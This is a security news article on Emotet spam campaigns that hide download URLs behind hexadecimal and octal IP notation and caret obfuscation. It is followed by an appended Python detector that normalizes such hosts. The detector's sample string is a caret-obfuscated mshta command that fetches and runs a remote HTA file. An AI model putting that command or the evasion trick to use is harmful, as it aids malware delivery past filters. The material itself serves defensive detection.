duo.com
URL: https://duo.com/decipher/emotet-spam-attacks-use-hexadecimal-octal-ip-addresses
Submission: On February 02 via manual from JP — Scanned from JP
Jan 21, 2022

EMOTET SPAM ATTACKS USE HEXADECIMAL, OCTAL IP ADDRESSES

By Lindsey O’Donnell-Welch

The known tactic, which helps attackers sidestep detection, has been observed in spam messages that deploy Emotet.

Researchers have observed recent Emotet campaigns adopting a known technique, the use of “unconventional” representations of IP addresses, for the first time, in order to avoid detection.

There are various formats for representing IP addresses, the unique numerical addresses assigned to each device on a network. Most people are familiar with dotted-decimal notation, a string of four decimal numbers separated by single periods. Other representations exist outside of dotted-decimal notation, however, including octal notation, where each decimal number is converted to an octal value, and hexadecimal notation, where each decimal number is converted to a hexadecimal value. Web browsers accept these different IP formats as valid by automatically converting them to a dotted-decimal IP address.

Threat actors launching spam or phishing attacks have previously employed such encoded hexadecimal and octal IP address formats in the hostname part of their URLs, including in 2020 campaigns that redirected victims to websites selling fake pills, medicine and health products, in order to trick the email gateway and lure the end-user victim into clicking the URLs. Researchers with Trend Micro, in a Friday analysis of the attack, said they believe this was the aim of the spammers in a recently observed campaign, whose end goal was infecting email recipients with the Emotet malware.

Ian Kenefick, threat hunter with Trend Micro, said that while the abuse of these IP address formats by cybercriminals has been prevalent over the past decade, this is the first time the tactic has been observed in Emotet campaigns.

"The actors behind Emotet are constantly tweaking their techniques in order to evade defenses and this latest development represents yet another effort to sidestep defenses," said Kenefick.

The spam campaign, which targeted victims in North America, Europe and Asia, used hijacked email threads with an attached document leveraging Excel 4.0 macros, a feature that is commonly abused by cybercriminals (and that Microsoft this week announced would be disabled by default for Microsoft 365 tenants). Once the target enabled macros, the malware was executed.

In the recent Emotet campaign, “the URL is obfuscated with carets and the host contains a hexadecimal representation of the IP address,” said researchers. “Once executed, the macro invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which will download and execute an HTML application (HTA) code from the remote host.”

Similarly, in another email, researchers found the URL obfuscated with carets and the host containing the octal representation of the IP address. Upon receiving a URL in one of these formats, the operating system automatically converts the value to its dotted-decimal representation before initiating the request to the remote server, researchers said.

These hexadecimal and octal IP addresses could help attackers evade spam detection systems and URL blocklists, but security teams can also treat the tactic as a detection opportunity by enabling filters that flag such IP address representations as suspicious.

“Users and businesses are cautioned to detect, block, and enable the relevant security measures to prevent compromise using Emotet for second stage delivery of malware such as TrickBot and Cobalt Strike,” said Kenefick.

He added that organizations can "use security solutions which leverage behaviour monitoring, machine learning technologies and custom sandboxing – all of which combine to provide an effective defense against new techniques without requiring specific updates to detect them."

After returning in November, nearly ten months after law enforcement disrupted its infrastructure in an internationally coordinated operation, Emotet has been seen in various spam campaigns in recent months. In December, for instance, researchers observed the malware updating its attack vector by installing Cobalt Strike beacons directly rather than dropping an intermediate payload first.

Kenefick said researchers expect Emotet actors to continue to evolve their tactics in an effort to evade security solutions.

"While the exact techniques they use to bypass defenses will continue to change and are harder to predict, their business model and focus is well defined – building a leading criminal platform for malware distribution that allows their criminal customer base to serve up malware directly to their target demographics at scale," Kenefick said.
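As an added example (not code from the article or from Trend Micro), the following Python normalizes the IPv4 notations the article describes (hex, octal, plus the dword and short forms that the classic inet_aton parser also accepts) to dotted-decimal, flags URLs whose host is written in an encoded form, and strips the cmd.exe caret escapes first so an obfuscated command line can be checked the way the shell will see it. The command line and the 192.168.0.1 address are constructed sample values, not indicators from the campaign.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a caret-obfuscated mshta command line with a hex host.
SAMPLE_CMD = 'cmd /c msh^ta h^ttp://0xc0a80001/dl.hta'
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def parse_ipv4_literal(host: str):
    """Dotted-decimal form of an IPv4 literal in any notation inet_aton
    accepts (parts may be decimal, octal with leading 0, or 0x hex; with
    fewer than four parts the last one fills the remaining bytes), else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", p):
            values.append(int(p[2:], 16))
        elif re.fullmatch(r"0[0-7]*", p):
            values.append(int(p, 8))
        elif re.fullmatch(r"[1-9][0-9]*", p):
            values.append(int(p, 10))
        else:
            return None
    *lead, last = values
    # Leading parts must be single bytes; the last part fills what remains.
    if any(v > 255 for v in lead) or last >= 256 ** (4 - len(lead)):
        return None
    addr = last
    for i, v in enumerate(lead):
        addr |= v << (8 * (3 - i))
    return ".".join(str((addr >> s) & 255) for s in (24, 16, 8, 0))


def encoded_ip_host(url: str):
    """Canonical dotted-decimal address when the URL's host is an IPv4 literal
    written in any form other than four-part dotted-decimal, else None."""
    host = urlsplit(url).hostname or ""
    canonical = parse_ipv4_literal(host)
    return canonical if canonical and canonical != host else None


def suspicious_urls_in_command(cmd: str):
    """cmd.exe strips '^' (its escape character) before running a line, so
    remove carets first, then report URLs with an encoded IPv4 host together
    with the dotted-decimal address the OS will actually contact."""
    plain = cmd.replace("^", "")
    return [(u, c) for u in URL_RE.findall(plain) if (c := encoded_ip_host(u))]
```

The returned canonical address is what a blocklist or proxy log should be matched against, since that is the form the operating system resolves the encoded host to.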